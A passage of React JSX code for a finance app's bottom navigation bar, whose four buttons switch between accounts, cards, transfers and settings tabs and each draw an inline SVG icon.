  onClick={() => setActiveTab('accounts')}
  className={`flex items-center justify-center ${activeTab === 'accounts' ? 'text-violet-300' : 'text-gray-400'}`}
>
  <svg width="26" height="26" viewBox="0 0 24 24" fill="currentColor">
    <path d="M12.97 2.59a1.5 1.5 0 0 0-1.94 0l-7.5 6.363A1.5 1.5 0 0 0 3 10.097V19.5A1.5 1.5 0 0 0 4.5 21h4.75a.75.75 0 0 0 .75-.75V14h4v6.25c0 .414.336.75.75.75h4.75a1.5 1.5 0 0 0 1.5-1.5v-9.403a1.5 1.5 0 0 0-.53-1.144l-7.5-6.363Z"/>
  </svg>
</button>
    <button
      onClick={() => setActiveTab('cards')}
      className={`flex items-center justify-center ${activeTab === 'cards' ? 'text-violet-300' : 'text-gray-400'}`}
    >
      <svg width="26" height="26" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
        <rect x="1" y="4" width="22" height="16" rx="2" ry="2"/>
        <line x1="1" y1="10" x2="23" y2="10"/>
      </svg>
    </button>
    <button
      onClick={() => setActiveTab('transfers')}
      className={`flex items-center justify-center ${activeTab === 'transfers' ? 'text-violet-300' : 'text-gray-400'}`}
    >
      <svg width="26" height="26" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
        <polyline points="17 1 21 5 17 9"/>
        <path d="M3 11V9a4 4 0 0 1 4-4h14"/>
        <polyline points="7 23 3 19 7 15"/>
        <path d="M21 13v2a4 4 0 0 1-4 4H3"/>
      </svg>
    </button>
    <button
      onClick={() => setActiveTab('settings')}
      className={`flex items-center justify-center ${activeTab === 'settings' ? 'text-violet-300' : 'text-gray-400'}`}
    >
      <svg width="26" height="26" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
        <path d="M12.22 2h-.44a2 2 0 0 0-2 2v.18a2 2 0 0 1-1 1.73l-.43.25a2 2 0 0 1-2 0l-.15-.08a2 2 0 0 0-2.73.73l-.22.38a2 2 0 0 0 .73 2.73l.15.1a2 2 0 0 1 1 1.72v.51a2 2 0 0 1-1 1.74l-.15.09a2 2 0 0 0-.73 2.73l.22.38a2 2 0 0 0 2.73.73l.15-.08a2 2 0 0 1 2 0l.43.25a2 2 0 0 1 1 1.73V20a2 2 0 0 0 2 2h.44a2 2 0 0 0 2-2v-.18a2 2 0 0 1 1-1.73l.43-.25a2 2 0 0 1 2 0l.15.08a2 2 0 0 0 2.73-.73l.22-.39a2 2 0 0 0-.73-2.73l-.15-.08a2 2 0 0 1-1-1.74v-.5a2 2 0 0 1 1-1.74l.15-.09a2 2 0 0 0 .73-2.73l-.22-.38a2 2 0 0 0-2.73-.73l-.15.08a2 2 0 0 1-2 0l-.43-.25a2 2 0 0 1-1-1.73V4a2 2 0 0 0-2-2z"/>
        <circle cx="12" cy="12" r="3"/>
      </svg>
    </button>
  </div>
</nav>
        </div>
      );

    default:
      return null;
  }
}
